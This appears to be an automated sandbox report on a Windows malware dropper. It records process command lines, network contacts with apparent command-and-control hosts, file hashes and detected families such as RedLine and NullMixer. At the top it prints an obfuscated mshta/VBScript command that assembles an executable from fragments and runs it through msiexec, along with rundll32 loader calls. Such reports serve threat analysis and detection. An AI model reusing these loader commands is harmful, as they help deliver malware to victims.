"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct ( "WscRiPt.ShElL" ). RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W + pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT + lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"

C:\Windows\SysWOW64\msiexec.exe

msiexec /Y .\6~iPCLZ.rJ

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 hsiens.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 ppp-gl.biz udp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 propanla.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 104.155.138.21:80 ppp-gl.biz tcp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 104.155.138.21:80 ppp-gl.biz tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 172.67.74.161:443 iplogger.org tcp
NL 194.104.136.5:46013 tcp
US 172.67.74.161:443 iplogger.org tcp
FI 135.181.129.119:4805 tcp
US 107.178.223.183:80 ppp-gl.biz tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.83:80 crl.microsoft.com tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:80 www.microsoft.com tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
N/A 127.0.0.1:49295 tcp
N/A 127.0.0.1:49297 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 8f86dedab3baf5ffaaebb8a77d417737
SHA1 2469e1057b3a544402d57a602a916b0663a8ff8c
SHA256 b25679ef641f0a807ef8200eb0ec464680dfdfff23b42bad85099b140c5d5630
SHA512 2f70caeb89da15a3b1222b52cf49b09af61937b1bf92b5c0baad4d222a9c02f30e174cc9bd8078531fac26213fb990ab1cac78b13f38e7cbc75389685b0ec61c

\Users\Admin\AppData\Local\Temp\7zSCEA9C056\setup_install.exe

MD5 789258af8927e9426e113f79a5c2ebcf
SHA1 6c64f717f5fc68e602760fefbc2221fd35fd7530
SHA256 f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923
SHA512 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/3008-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3008-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3008-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-83-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3008-89-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3008-88-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3008-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-86-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-85-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-82-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3008-81-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20ba391d4469.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20fbc038b0b02ea.exe

MD5 a98672182143436478fdb3806ef6cd5a
SHA1 5d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA256 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA512 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209c4b463b.exe

MD5 a729d63514511766fcdd2de19cdbd017
SHA1 737827e5c0ab0adc287d3b3bb16d26a9a42f0939
SHA256 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728
SHA512 ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20e095683c2b3a0c.exe

MD5 44cfc728f9fbacd834c9b10ce768d41a
SHA1 6589a1435a2ba5ec11a312de5f339597831227d0
SHA256 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68
SHA512 dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri208f5f140853548.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20c0c46650eeb2a.exe

MD5 ecc773623762e2e326d7683a9758491b
SHA1 ad186c867976dc5909843418853d54d4065c24ba
SHA256 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA512 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri209d5bfbb2.exe

MD5 d08cc10c7c00e13dfb01513f7f817f87
SHA1 f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA256 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

memory/1964-144-0x0000000000270000-0x0000000000276000-memory.dmp

memory/1740-136-0x0000000000CD0000-0x0000000000D42000-memory.dmp

memory/1964-135-0x0000000000C40000-0x0000000000C58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCEA9C056\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

memory/2240-139-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1284-157-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2368-159-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2240-158-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DRFHC.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2440-162-0x0000000003810000-0x0000000003834000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1372-165-0x00000000008D0000-0x00000000008D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PMFSC.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2440-173-0x0000000003920000-0x0000000003942000-memory.dmp

memory/3052-216-0x0000000002870000-0x00000000029BC000-memory.dmp

memory/1684-219-0x00000000026E0000-0x0000000002909000-memory.dmp

memory/2968-226-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-231-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-230-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-229-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-228-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2968-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2968-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/3008-235-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3008-238-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3008-240-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-239-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3008-237-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3008-241-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3008-245-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3008-248-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3008-249-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3008-247-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3008-242-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3008-236-0x0000000064940000-0x0000000064959000-memory.dmp

memory/852-250-0x0000000000400000-0x00000000016BC000-memory.dmp

memory/2276-251-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/2440-252-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/2368-253-0x0000000000400000-0x0000000000414000-memory.dmp

memory/572-254-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3052-259-0x0000000002870000-0x00000000029BC000-memory.dmp

memory/1684-260-0x00000000026E0000-0x0000000002909000-memory.dmp

memory/3052-261-0x0000000002DE0000-0x0000000002E85000-memory.dmp

memory/3052-265-0x0000000000CF0000-0x0000000000D82000-memory.dmp

memory/3052-262-0x0000000000CF0000-0x0000000000D82000-memory.dmp

memory/2276-272-0x0000000000400000-0x00000000016D5000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win10v2004-20241007-en

Max time kernel

15s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\46721d1d1de3e64489a9ad56479ad9d1040b4ce72c4cb3f1042341ce6bc91308.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2776 set thread context of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-6JK77.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe N/A
